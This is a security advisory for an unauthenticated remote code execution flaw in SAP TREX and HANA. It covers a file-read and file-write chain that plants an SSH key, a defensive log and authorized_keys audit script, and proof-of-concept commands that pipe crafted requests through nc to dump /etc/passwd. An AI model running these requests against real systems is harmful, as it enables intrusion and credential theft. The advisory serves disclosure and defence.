[ERPSCAN-17-019] SAP TREX RCE
Application: SAP TREX
Versions Affected: SAP TREX 7.10
Vendor URL: SAP
Bugs: RCE
Reported: 23.01.2017
Vendor response: 24.01.2017
Date of Public Advisory: 11.04.2017
Reference: SAP Security Note 2419592
Author: Mathieu Geli (ERPScan)
VULNERABILITY INFORMATION
Class: Missing Authentication for Critical Function
Impact: disclose OS files and potentially get RCE on the server (example for Linux)
Remotely Exploitable: yes
Locally Exploitable: no
CVE Name: CVE-2017-11459
CVSS Information
CVSS v3 Base Score: 9.4 / 10
CVSS v3 Base Vector:
AV: Attack Vector (Related exploit range): Network (N)
AC: Attack Complexity (Required attack complexity): Low (L)
PR: Privileges Required (Level of privileges needed to exploit): None (N)
UI: User Interaction (Required user participation): None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component): Unchanged (U)
C: Impact to Confidentiality: High (H)
I: Impact to Integrity: High (H)
A: Impact to Availability: Low (L)
Description
Several sensitive operations are exposed without authentication; combined, they can potentially yield remote command execution on the server.
Business risk
A remote command execution vulnerability allows an attacker to inject code that the application then executes. The executed commands run with the same privileges as the service that executed them.
VULNERABLE PACKAGES
SAP TREX 7.10.72 (other versions not tested)
SAP HANA SPS12 (1.00.122.01.1470046197I)
SAP HANA 2.0 express edition (2.00.000.00.1479874437I)
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2419592.
TECHNICAL DESCRIPTION
An attacker can forge a specially crafted request to the TREXNet ports 3NN01, 3NN02, 3NN03, 3NN04, 3NN06, 3NN07, 3NN08 (NN being the SAP instance number) to read OS files (command 'fget') or create files (command 'fdir').
If the system is Linux (where SSH is activated by default), we can showcase how to get a shell on the server with those two operations by uploading a public key into the service user's ~/.ssh/authorized_keys file and then connecting to the server via SSH, taking full control of the TREX daemon.
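As an added defensive example (not part of the advisory and not ERPScan's or SAP's code), the script below checks for the two observable traces of the chain described above: allowed network flows reaching the TREXNet ports from outside the networks that are expected to talk to TREX, and public keys in the service user's authorized_keys that are not on an allowlist. The port suffixes are the ones listed in the advisory; the flow-log format, the instance number 00, the sample flow lines and the key blobs are constructed for this example and are not real logs or keys.

```python
import re
from ipaddress import ip_address, ip_network

# TREXNet port suffixes named in the advisory (3NN01 ... 3NN08, 05 is not listed);
# NN is the two-digit SAP instance number, so instance 00 listens on 30001-30008.
TREXNET_SUFFIXES = ("01", "02", "03", "04", "06", "07", "08")

# OpenSSH key types recognised when auditing authorized_keys lines.
KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ssh-dss",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")

# Hypothetical flow-log format, constructed for this example (not a real product's format):
#   <timestamp> ALLOW|DENY TCP <src_ip>:<src_port> -> <dst_ip>:<dst_port>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) TCP "
    r"(?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample flows; 10.0.0.10 plays the TREX host, 10.0.0.0/24 the admin LAN.
SAMPLE_FLOWS = [
    "2017-01-23T10:00:01Z ALLOW TCP 10.0.0.5:51000 -> 10.0.0.10:30001",
    "2017-01-23T10:00:02Z ALLOW TCP 203.0.113.7:40222 -> 10.0.0.10:30001",
    "2017-01-23T10:00:03Z ALLOW TCP 203.0.113.7:40223 -> 10.0.0.10:30005",
    "2017-01-23T10:00:04Z DENY TCP 198.51.100.9:33001 -> 10.0.0.10:30008",
    "2017-01-23T10:00:05Z ALLOW TCP 198.51.100.9:33002 -> 10.0.0.10:30008",
    "2017-01-23T10:00:06Z ALLOW TCP 203.0.113.7:40224 -> 10.0.0.10:443",
]

# Constructed authorized_keys content for the TREX service user; the key blobs are
# placeholders, not real keys.
SAMPLE_AUTHORIZED_KEYS = """# keys for the trex service user (constructed sample)
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKNOWNKEY admin@jumphost

command="/usr/bin/true" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABPLACEHOLDERUNKNOWNKEY unexpected-key
"""
KNOWN_KEY_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKNOWNKEY"}


def trexnet_ports(instance_number):
    """Return the set of TREXNet ports for a SAP instance number (0-99)."""
    nn = f"{int(instance_number):02d}"
    return {int(f"3{nn}{suffix}") for suffix in TREXNET_SUFFIXES}


def find_unexpected_trexnet_clients(flow_lines, instance_number, trusted_networks):
    """Flag allowed TCP flows to TREXNet ports whose source is outside trusted networks.

    Returns a list of (timestamp, source_ip, destination_port) tuples.
    """
    ports = trexnet_ports(instance_number)
    trusted = [ip_network(n) for n in trusted_networks]
    findings = []
    for line in flow_lines:
        m = LOG_RE.match(line.strip())
        if not m or m.group("action") != "ALLOW":
            continue                      # malformed line or already blocked
        dport = int(m.group("dport"))
        if dport not in ports:
            continue                      # not a TREXNet port of this instance
        src = ip_address(m.group("src"))
        if any(src in net for net in trusted):
            continue                      # expected client (HANA node, admin host, ...)
        findings.append((m.group("ts"), str(src), dport))
    return findings


def unexpected_authorized_keys(authorized_keys_text, known_key_blobs):
    """Return (line_number, key_type, comment) for keys not in the allowlist.

    Handles an optional leading options field (e.g. command="...") by scanning
    for the first token that is a known key type; the next token is the key blob.
    """
    findings = []
    for lineno, raw in enumerate(authorized_keys_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        for i, tok in enumerate(tokens):
            if tok in KEY_TYPES and i + 1 < len(tokens):
                blob = tokens[i + 1]
                comment = " ".join(tokens[i + 2:])
                if blob not in known_key_blobs:
                    findings.append((lineno, tok, comment))
                break
    return findings


if __name__ == "__main__":
    for ts, src, port in find_unexpected_trexnet_clients(SAMPLE_FLOWS, "00", ["10.0.0.0/24"]):
        print(f"{ts} unexpected client {src} reached TREXNet port {port}")
    for lineno, ktype, comment in unexpected_authorized_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_KEY_BLOBS):
        print(f"authorized_keys line {lineno}: unknown {ktype} key ({comment!r})")
```

On a real system the trusted network list would be the HANA nodes and administration hosts that legitimately use TREXNet, and the allowlist of key blobs would be taken from a configuration-management record rather than hard-coded; a non-empty result from either function on a host that is not yet patched with SAP Security Note 2419592 is a reason to check the ~/.ssh directory and the TREX file system for unexpected writes.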
Proof of Concept
The first attached file "trex_fget_passwd.bin" is a request to dump the OS file /etc/passwd on a Unix TREX 7.10 patched server.
You can run the exploit like this:

    $ cat trex_fget_passwd.bin | nc <TREXSERVER> 30001

NB: The port can be any of the TREX ports (from 30001 to 30009).
The response should be the content of the /etc/passwd file, like:

    at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
    bin:x:1:1:bin:/bin:/bin/bash
    daemon:x:2:2:Daemon:/sbin:/bin/bash
    ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
    games:x:12:100:Games account:/var/games:/bin/bash
    gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
    [...]
The second file is for HANA SPS12, dumping /etc/passwd:

    $ cat hanaSPS12_fget_passwd.bin | nc <HANASERVER> 30001

NB: The port can be any of the TREX ports (from 30001 to 30009).
The response should be the content of the /etc/passwd file, looking like:

    at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
    bin:x:1:1:bin:/bin:/bin/bash
    daemon:x:2:2:Daemon:/sbin:/bin/bash
    ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
    games:x:12:100:Games account:/var/games:/bin/bash
    gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
    [...]